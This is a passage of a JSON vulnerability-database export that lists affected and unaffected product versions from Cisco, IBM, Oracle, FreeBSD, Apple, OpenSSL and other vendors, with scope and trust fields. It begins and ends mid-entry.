        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "clean access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(3.10000.9)"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6(3)"
      },
      {
        "model": "10.2-release-p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.3"
      },
      {
        "model": "proactive network operations center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87104.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.40"
      },
      {
        "model": "emergency responder",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "video distribution suite for internet streaming",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3.2"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.2"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "8.53"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.6.0"
      },
      {
        "model": "video surveillance media server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "nexus series blade switches 0.9.8zf",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4000"
      },
      {
        "model": "telepresence isdn link",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.1.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.5"
      },
      {
        "model": "project openssl 1.0.2g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.1"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32400"
      },
      {
        "model": "telepresence sx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.6"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.4"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "85100"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.131"
      },
      {
        "model": "unified workforce optimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.0.2"
      },
      {
        "model": "mediasense 9.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "abyp-4tl-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "cognos business intelligence interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.119"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1209"
      },
      {
        "model": "asr series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "aspera shares",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.9.6"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "10.1-release-p26",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3400"
      },
      {
        "model": "enterprise content delivery system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.6.8"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.2"
      },
      {
        "model": "prime collaboration assurance sp1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "tivoli netcool system service monitors fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1)"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.16"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "intelligent automation for cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(2)"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3361"
      },
      {
        "model": "10.1-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "69010"
      },
      {
        "model": "prime security manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.5.4.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.13-34"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "im and presence service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1879.2.5"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "ucs central 1.5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5(2)"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.1"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime collaboration deployment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "series ip phones vpn feature",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800-11.5.2"
      },
      {
        "model": "mobile foundation consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.0.1"
      },
      {
        "model": "web security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3394"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.2"
      },
      {
        "model": "visual quality experience server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "filenet system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "project openssl 1.0.1t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "anyconnect secure mobility client for windows",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "content security management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p28",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "agent for openflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.1"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "webex recording playback client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime collaboration assurance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "asa next-generation firewall services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p38",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence content server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tandberg codian mse model",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "83200"
      },
      {
        "model": "local collector appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.2"
      },
      {
        "model": "9.3-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "44000"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90008.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.16-37"
      },
      {
        "model": "10.2-release-p13",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.1"
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "prime infrastructure standalone plug and play gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "spa50x series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings for blackberry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.014-01"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.3"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.5.1"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "2.0"
      },
      {
        "model": "tivoli netcool system service monitors fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.4"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3.7"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5"
      },
      {
        "model": "anyconnect secure mobility client",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "wide area application services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.1.1"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87100"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.1"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4-23"
      },
      {
        "model": "10.2-release-p14",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p17",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.25-57"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-109"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.18-43"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "workload deployer if12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.0.7"
      },
      {
        "model": "cognos business intelligence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "media services interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "nexus intercloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "media experience engines",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.5"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.0.0"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.1"
      },
      {
        "model": "ips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.4.2"
      },
      {
        "model": "unified workforce optimization quality management sr3 es5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "qradar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "meetingplace",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.7"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.2"
      },
      {
        "model": "commerce guided search",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.2"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "unified attendant console advanced",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "prime access registrar",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.0.1.7"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "webex messenger service ep1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.9.9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.3"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "mediasense",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5.1"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8961"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.1"
      },
      {
        "model": "10.2-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified wireless ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "10.1-release-p27",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "spa122 ata with router",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "media experience engines",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "webex meeting center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "webex node for mcs",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.12.9.8"
      },
      {
        "model": "jabber for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance 4300e/4500e high-definition ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2.8"
      },
      {
        "model": "mobilefirst platform foundation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "10.2-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack interix fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "unified sip proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "virtual security gateway for microsoft hyper-v",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(1)"
      },
      {
        "model": "tandberg codian isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32100"
      },
      {
        "model": "unified attendant console premium edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media players series 5.4 rb",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4300"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.11-28"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "qradar",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.31"
      },
      {
        "model": "prime optical for sps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1"
      },
      {
        "model": "abyp-2t-1s-1l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "mds series multilayer switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90006.2.17"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.19"
      },
      {
        "model": "project openssl 1.0.1r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.03"
      },
      {
        "model": "aspera console",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.1"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.0.997"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.3"
      },
      {
        "model": "unified ip phone series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "79000"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "lancope stealthwatch flowsensor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "connected analytics for collaboration 1.0.1q",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.20"
      },
      {
        "model": "jabber guest",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "abyp-2t-1s-1l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2(2)"
      },
      {
        "model": "lancope stealthwatch flowcollector sflow",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "mmp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.30.0-13"
      },
      {
        "model": "commerce guided search",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "tivoli provisioning manager for images build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20280.6"
      },
      {
        "model": "computer telephony integration object server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.51"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6.7"
      },
      {
        "model": "prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "9.3.4.2-4"
      },
      {
        "model": "anyres live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.14"
      },
      {
        "model": "ons series multiservice provisioning platforms",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1545410.6.1"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70104.4"
      },
      {
        "model": "packet tracer",
        "scope": "eq",
        "trust": 0.3,
